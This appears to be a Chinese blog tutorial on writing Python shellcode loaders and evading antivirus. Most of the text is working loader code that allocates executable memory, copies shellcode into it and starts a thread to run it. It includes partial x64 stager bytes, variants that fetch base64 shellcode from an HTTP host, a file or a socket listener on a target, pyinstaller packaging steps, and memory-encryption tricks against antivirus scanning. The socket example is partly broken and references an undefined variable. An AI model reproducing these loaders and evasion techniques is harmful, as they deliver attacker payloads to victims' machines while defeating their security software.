Python Shellcode加载与免杀技术详解<\/h1>

一、Python环境检测与打包工具<\/h2>

1.1 检测Python版本和系统位数<\/h3>
import<\/span> struct
<\/span><\/span>print(struct.<\/span>calcsize("p"<\/span>)*<\/span>8<\/span>)  # 输出系统位数，如64<\/span>
<\/span><\/span><\/code><\/pre>1.2 Python打包工具<\/h3>
常用的Python打包工具包括：<\/p>

py2exe<\/li>
pyinstaller<\/li>
cx_freeze<\/li>
<\/ul>
安装pyinstaller：<\/p>
pip install -i https:\/\/mirrors.aliyun.com\/pypi\/simple\/ pyinstaller
<\/span><\/span><\/code><\/pre>二、Shellcode加载器实现<\/h2>
2.1 基础加载器实现<\/h3>
加载器1 (loader1.py)<\/h4>
#!\/usr\/bin\/python<\/span>
<\/span><\/span>import<\/span> ctypes
<\/span><\/span>
<\/span><\/span>shellcode =<\/span> b<\/span>"shellcode代码"<\/span>
<\/span><\/span>
<\/span><\/span>ptr =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc(ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                        ctypes.<\/span>c_int(len(shellcode)), 
<\/span><\/span>                                        ctypes.<\/span>c_int(0x3000<\/span>), 
<\/span><\/span>                                        ctypes.<\/span>c_int(0x40<\/span>))
<\/span><\/span>
<\/span><\/span>buf =<\/span> (ctypes.<\/span>c_char *<\/span> len(shellcode)).<\/span>from_buffer(shellcode)
<\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlMoveMemory(ctypes.<\/span>c_int(ptr), 
<\/span><\/span>                                   buf, 
<\/span><\/span>                                   ctypes.<\/span>c_int(len(shellcode)))
<\/span><\/span>
<\/span><\/span>ht =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread(ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                       ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                       ctypes.<\/span>c_int(ptr), 
<\/span><\/span>                                       ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                       ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                       ctypes.<\/span>pointer(ctypes.<\/span>c_int(0<\/span>)))
<\/span><\/span>
<\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>WaitForSingleObject(ctypes.<\/span>c_int(ht), ctypes.<\/span>c_int(-<\/span>1<\/span>))
<\/span><\/span><\/code><\/pre>加载器2 (loader2.py)<\/h4>
import<\/span> ctypes
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> base64
<\/span><\/span>
<\/span><\/span>scbytes =<\/span> b<\/span>'<\/span>\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41<\/span>...'<\/span>
<\/span><\/span>
<\/span><\/span># 设置函数返回类型和参数类型<\/span>
<\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc.<\/span>restype =<\/span> ctypes.<\/span>c_void_p
<\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlCopyMemory.<\/span>argtypes =<\/span> (ctypes.<\/span>c_void_p, ctypes.<\/span>c_void_p, ctypes.<\/span>c_size_t)
<\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread.<\/span>argtypes =<\/span> (ctypes.<\/span>c_int, ctypes.<\/span>c_int, ctypes.<\/span>c_void_p, ctypes.<\/span>c_int, ctypes.<\/span>c_int, ctypes.<\/span>POINTER(ctypes.<\/span>c_int))
<\/span><\/span>
<\/span><\/span>space =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc(ctypes.<\/span>c_int(0<\/span>),
<\/span><\/span>                                          ctypes.<\/span>c_int(len(scbytes)),
<\/span><\/span>                                          ctypes.<\/span>c_int(0x3000<\/span>),
<\/span><\/span>                                          ctypes.<\/span>c_int(0x40<\/span>))
<\/span><\/span>
<\/span><\/span>buff =<\/span> (ctypes.<\/span>c_char *<\/span> len(scbytes)).<\/span>from_buffer_copy(scbytes)
<\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlMoveMemory(ctypes.<\/span>c_void_p(space),
<\/span><\/span>                                   buff,
<\/span><\/span>                                   ctypes.<\/span>c_int(len(scbytes)))
<\/span><\/span>
<\/span><\/span>handle =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread(ctypes.<\/span>c_int(0<\/span>),
<\/span><\/span>                                           ctypes.<\/span>c_int(0<\/span>),
<\/span><\/span>                                           ctypes.<\/span>c_void_p(space),
<\/span><\/span>                                           ctypes.<\/span>c_int(0<\/span>),
<\/span><\/span>                                           ctypes.<\/span>c_int(0<\/span>),
<\/span><\/span>                                           ctypes.<\/span>pointer(ctypes.<\/span>c_int(0<\/span>)))
<\/span><\/span>
<\/span><\/span>ctypes.<\/span>windll.<\/span>kernel32.<\/span>WaitForSingleObject(handle, -<\/span>1<\/span>)
<\/span><\/span><\/code><\/pre>2.2 Shellcode加密与参数传递<\/h3>
Base64加密Shellcode (base64-shellcode.py)<\/h4>
import<\/span> base64
<\/span><\/span>
<\/span><\/span>shellcode =<\/span> b<\/span>"<\/span>\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x72\x50\x48\x0f\xb7\x4a<\/span>..."<\/span>
<\/span><\/span>
<\/span><\/span>sc =<\/span> base64.<\/span>b64encode(shellcode)
<\/span><\/span>print(sc)
<\/span><\/span><\/code><\/pre>参数传递加载器 (canshu+loader2.py)<\/h4>
import<\/span> ctypes
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> base64
<\/span><\/span>import<\/span> ctypes
<\/span><\/span>from<\/span> loader2 import<\/span> scbytes
<\/span><\/span>
<\/span><\/span>def<\/span> loader<\/span>(scbytes):
<\/span><\/span>    ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc.<\/span>restype =<\/span> ctypes.<\/span>c_void_p
<\/span><\/span>    ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlCopyMemory.<\/span>argtypes =<\/span> (ctypes.<\/span>c_void_p, ctypes.<\/span>c_void_p, ctypes.<\/span>c_size_t)
<\/span><\/span>    ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread.<\/span>argtypes =<\/span> (ctypes.<\/span>c_int, ctypes.<\/span>c_int, ctypes.<\/span>c_void_p, ctypes.<\/span>c_int, ctypes.<\/span>c_int, ctypes.<\/span>POINTER(ctypes.<\/span>c_int))
<\/span><\/span>    
<\/span><\/span>    space =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc(ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                              ctypes.<\/span>c_int(len(scbytes)), 
<\/span><\/span>                                              ctypes.<\/span>c_int(0x3000<\/span>),
<\/span><\/span>                                              ctypes.<\/span>c_int(0x40<\/span>))
<\/span><\/span>    
<\/span><\/span>    buff =<\/span> (ctypes.<\/span>c_char *<\/span> len(scbytes)).<\/span>from_buffer_copy(scbytes)
<\/span><\/span>    ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlMoveMemory(ctypes.<\/span>c_void_p(space), 
<\/span><\/span>                                       buff, 
<\/span><\/span>                                       ctypes.<\/span>c_int(len(scbytes)))
<\/span><\/span>    
<\/span><\/span>    handle =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread(ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                               ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                               ctypes.<\/span>c_void_p(space), 
<\/span><\/span>                                               ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                               ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                               ctypes.<\/span>pointer(ctypes.<\/span>c_int(0<\/span>)))
<\/span><\/span>    
<\/span><\/span>    ctypes.<\/span>windll.<\/span>kernel32.<\/span>WaitForSingleObject(handle, -<\/span>1<\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__==<\/span>'__main__'<\/span>:
<\/span><\/span>    sc =<\/span> sys.<\/span>argv[1<\/span>]  # 从命令行参数获取Base64编码的Shellcode<\/span>
<\/span><\/span>    scbyte =<\/span> base64.<\/span>b64decode(sc)
<\/span><\/span>    print(sc)
<\/span><\/span>    print(scbyte)
<\/span><\/span>    loader(scbyte)
<\/span><\/span><\/code><\/pre>使用方式：<\/p>
python canshu+loader2.py "BASE64_SHELLCODE"<\/span>
<\/span><\/span><\/code><\/pre>三、Shellcode传输方式<\/h2>
3.1 HTTP传输<\/h3>
HTTP加载器 (http+shellcode.py)<\/h4>
import<\/span> ctypes
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> base64
<\/span><\/span>import<\/span> ctypes
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span>def<\/span> loader<\/span>(scbytes):
<\/span><\/span>    # 同上loader函数实现<\/span>
<\/span><\/span>    pass<\/span>
<\/span><\/span>
<\/span><\/span>if<\/span> __name__==<\/span>'__main__'<\/span>:
<\/span><\/span>    sc =<\/span> requests.<\/span>get("http:\/\/192.168.16.109:8080\/sc.txt"<\/span>).<\/span>text  # 从HTTP获取Base64编码的Shellcode<\/span>
<\/span><\/span>    scbyte =<\/span> base64.<\/span>b64decode(sc)
<\/span><\/span>    print(sc)
<\/span><\/span>    print(scbyte)
<\/span><\/span>    loader(scbyte)
<\/span><\/span><\/code><\/pre>启动HTTP服务：<\/p>
python3 -m http.server 8080<\/span>
<\/span><\/span><\/code><\/pre>3.2 文件传输<\/h3>
文件加载器 (file-shellcode.py)<\/h4>
import<\/span> ctypes
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> base64
<\/span><\/span>import<\/span> ctypes
<\/span><\/span>
<\/span><\/span>def<\/span> loader<\/span>(scbytes):
<\/span><\/span>    # 同上loader函数实现<\/span>
<\/span><\/span>    pass<\/span>
<\/span><\/span>
<\/span><\/span>if<\/span> __name__==<\/span>'__main__'<\/span>:
<\/span><\/span>    with<\/span> open("sc.txt"<\/span>,"r"<\/span>) as<\/span> f:
<\/span><\/span>        sc =<\/span> f.<\/span>read()
<\/span><\/span>    print(sc)
<\/span><\/span>    scbyte =<\/span> base64.<\/span>b64decode(sc)
<\/span><\/span>    loader(scbyte)
<\/span><\/span><\/code><\/pre>3.3 管道传输(Socket)<\/h3>
服务端代码 (socket_s1.py)<\/h4>
# -*- coding:utf-8 -*-<\/span>
<\/span><\/span>__author__ =<\/span> 'xiaodi'<\/span>
<\/span><\/span>import<\/span> socket,<\/span> base64,<\/span> ctypes,<\/span> os
<\/span><\/span>
<\/span><\/span>server =<\/span> socket.<\/span>socket()
<\/span><\/span>
<\/span><\/span># 执行代码<\/span>
<\/span><\/span>def<\/span> zx<\/span>(data):
<\/span><\/span>    scbytes =<\/span> base64.<\/span>b64decode(data +<\/span> b<\/span>'hud3DfoAQb7wtaJW\/9VIMcm6AABAAEG4ABAAAEG5QAAAAEG6WKRT5f\/VSJNTU0iJ50iJ8UiJ2kG4ACAAAEmJ+UG6EpaJ4v\/VSIPEIIXAdLZmiwdIAcOFwHXXWFhYSAUAAAAAUMPon\/3\/\/zE5Mi4xNjguMTM5LjE0MQAXUGXq'<\/span>)
<\/span><\/span>    print(scbytes)
<\/span><\/span>    
<\/span><\/span>    ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc.<\/span>restype =<\/span> ctypes.<\/span>c_void_p
<\/span><\/span>    ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlCopyMemory.<\/span>argtypes =<\/span> (ctypes.<\/span>c_void_p, ctypes.<\/span>c_void_p, ctypes.<\/span>c_size_t)
<\/span><\/span>    ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread.<\/span>argtypes =<\/span> (ctypes.<\/span>c_int, ctypes.<\/span>c_int, ctypes.<\/span>c_void_p, ctypes.<\/span>c_int, ctypes.<\/span>c_int, ctypes.<\/span>POINTER(ctypes.<\/span>c_int))
<\/span><\/span>    
<\/span><\/span>    space =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>VirtualAlloc(ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                              ctypes.<\/span>c_int(len(scbytes)), 
<\/span><\/span>                                              ctypes.<\/span>c_int(0x3000<\/span>),
<\/span><\/span>                                              ctypes.<\/span>c_int(0x40<\/span>))
<\/span><\/span>    
<\/span><\/span>    buff =<\/span> (ctypes.<\/span>c_char *<\/span> len(scbytes)).<\/span>from_buffer_copy(scbytes)
<\/span><\/span>    ctypes.<\/span>windll.<\/span>kernel32.<\/span>RtlMoveMemory(ctypes.<\/span>c_void_p(space), 
<\/span><\/span>                                       buff, 
<\/span><\/span>                                       ctypes.<\/span>c_int(len(scbytes)))
<\/span><\/span>    
<\/span><\/span>    handle =<\/span> ctypes.<\/span>windll.<\/span>kernel32.<\/span>CreateThread(ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                               ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                               ctypes.<\/span>c_void_p(space),
<\/span><\/span>                                               ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                               ctypes.<\/span>c_int(0<\/span>), 
<\/span><\/span>                                               ctypes.<\/span>pointer(ctypes.<\/span>c_int(0<\/span>)))
<\/span><\/span>    
<\/span><\/span>    ctypes.<\/span>windll.<\/span>kernel32.<\/span>WaitForSingleObject(handle, -<\/span>1<\/span>)
<\/span><\/span>    return<\/span> scbytes
<\/span><\/span>
<\/span><\/span># 等待监听<\/span>
<\/span><\/span>server =<\/span> socket.<\/span>socket()
<\/span><\/span>server.<\/span>bind(("0.0.0.0"<\/span>, 9999<\/span>))
<\/span><\/span>server.<\/span>listen(5<\/span>)
<\/span><\/span>
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    conn, addr =<\/span> server.<\/span>accept()
<\/span><\/span>    print("new addr:"<\/span>, addr)
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        data =<\/span> conn.<\/span>recv(1024<\/span>)
<\/span><\/span>        if<\/span> not<\/span> data:
<\/span><\/span>            print("客户端已断开"<\/span>)
<\/span><\/span>            break<\/span>
<\/span><\/span>        print("执行指令:"<\/span>, data)
<\/span><\/span>        zx(data)
<\/span><\/span>        
<\/span><\/span>        if<\/span> len(cmd_res) ==<\/span> 0<\/span>:
<\/span><\/span>            cmd_res =<\/span> "cmd has no output...."<\/span>
<\/span><\/span>        
<\/span><\/span>        conn.<\/span>send(str(len(cmd_res.<\/span>encode())).<\/span>encode())  # 发送数据长度<\/span>
<\/span><\/span>        conn.<\/span>send(cmd_res.<\/span>encode("utf-8"<\/span>))  # 发送数据<\/span>
<\/span><\/span>        print("send done"<\/span>)
<\/span><\/span>
<\/span><\/span>server.<\/span>close()
<\/span><\/span><\/code><\/pre>客户端代码 (socket_c1.py)<\/h4>
import<\/span> socket
<\/span><\/span>
<\/span><\/span>client =<\/span> socket.<\/span>socket()
<\/span><\/span>client.<\/span>connect(("192.168.139.163"<\/span>, 9999<\/span>))
<\/span><\/span>
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    cmd =<\/span> input(">>>"<\/span>).<\/span>strip()
<\/span><\/span>    if<\/span> len(cmd) ==<\/span> 0<\/span>:
<\/span><\/span>        continue<\/span>
<\/span><\/span>    
<\/span><\/span>    client.<\/span>send(cmd.<\/span>encode("utf-8"<\/span>))
<\/span><\/span>    cmd_res_size =<\/span> client.<\/span>recv(1024<\/span>)  # 接收命令长度<\/span>
<\/span><\/span>    print("命令结果大小:"<\/span>, cmd_res_size.<\/span>decode())
<\/span><\/span>    
<\/span><\/span>    recevied_size =<\/span> 0<\/span>  # 接收数据计数器<\/span>
<\/span><\/span>    recevied_data =<\/span> b<\/span>''<\/span>  # 接收数据缓冲区<\/span>
<\/span><\/span>    
<\/span><\/span>    while<\/span> recevied_size <<\/span> int(cmd_res_size.<\/span>decode()):
<\/span><\/span>        cmd_res =<\/span> client.<\/span>recv(1024<\/span>)
<\/span><\/span>        recevied_size +=<\/span> len(cmd_res)
<\/span><\/span>        recevied_data +=<\/span> cmd_res
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print(recevied_data.<\/span>decode("utf-8"<\/span>, "ignore"<\/span>))
<\/span><\/span>        print("cmd res receive done ...."<\/span>, recevied_size)
<\/span><\/span>
<\/span><\/span>client.<\/span>close()
<\/span><\/span><\/code><\/pre>四、打包与免杀技术<\/h2>
4.1 打包为EXE<\/h3>
使用pyinstaller打包：<\/p>
pyinstaller.exe -F "http+shellcode.py"<\/span>
<\/span><\/span>pyinstaller.exe -F file-shellcode.py
<\/span><\/span>pyinstaller.exe -F "canshu+loader2.py"<\/span>
<\/span><\/span>pyinstaller.exe -F socket_s1.py
<\/span><\/span><\/code><\/pre>打包后的文件会存放在dist目录下。<\/p>
4.2 免杀技术<\/h3>


Shellcode混淆与分离<\/strong><\/p>

让杀毒软件找不到特征<\/li>
执行时解密或解码<\/li>
分离加载器和Shellcode<\/li>
<\/ul>
<\/li>

内存加密技术<\/strong><\/p>

利用杀软间隙性扫描内存的特点<\/li>
在CS的shellcode调用sleep休眠时将可执行内存区域加密<\/li>
休眠结束时再将内存解密<\/li>
规避杀软内存扫描<\/li>
<\/ul>
<\/li>

Sleep休眠突破内存扫描<\/strong><\/p>

程序空闲时让shellcode处于加密状态<\/li>
执行时解密<\/li>
<\/ul>
<\/li>
<\/ol>
五、测试与上线<\/h2>


参数传递方式<\/strong><\/p>

直接运行canshu+load2.exe并传递加密后的shellcode<\/li>
<\/ul>
<\/li>

文件传输方式<\/strong><\/p>

同目录下要有sc.txt文件，存放加密的shellcode<\/li>
<\/ul>
<\/li>

HTTP传输方式<\/strong><\/p>

需要服务器开启相应端口的网站<\/li>
目录下放置包含shellcode的文件<\/li>
<\/ul>
<\/li>

管道传输方式<\/strong><\/p>

服务端放在目标服务器上<\/li>
客户端连接后传输加密的shellcode<\/li>
<\/ul>
<\/li>
<\/ol>
注意<\/strong>：卡巴斯基等杀毒软件擅长内存扫描，可能检测到这些技术。<\/p>